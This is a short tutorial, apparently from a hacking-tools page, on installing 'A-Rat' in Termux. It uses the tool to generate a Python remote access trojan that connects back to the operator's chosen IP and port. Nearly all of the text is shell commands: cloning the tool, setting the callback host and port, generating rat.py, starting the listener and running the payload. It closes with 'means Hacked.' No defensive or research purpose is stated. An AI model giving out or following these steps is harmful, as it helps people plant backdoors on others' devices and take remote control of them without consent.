Table of Contents
A-Rat = Remote access tool. We can generate a python-based rat.
Installation : #
- Open Termux app.
- Run the Following Commands
apt update
apt upgrade
apt install git
apt install python2
apt install python
git clone https://github.com/Xi4u7/A-Rat
cd A-Rat
chmod +x *
Usage : #
python2 A-Rat.py
help
set host 127.0.0.1 [your IP]
set port 1337
set output /$HOME/rat.py
generate
It generates rat.py in the termux home directory.
Open termux new session and type
ls
Here you get that rat.py, go to again A-Rat means the previous session of termux
Type run to start to exploit.
run
and then open a new session and run rat like this
python rat.py
and come back to A-Rat session
Now it’s connected to that rat. means Hacked.
Press control + c to stop.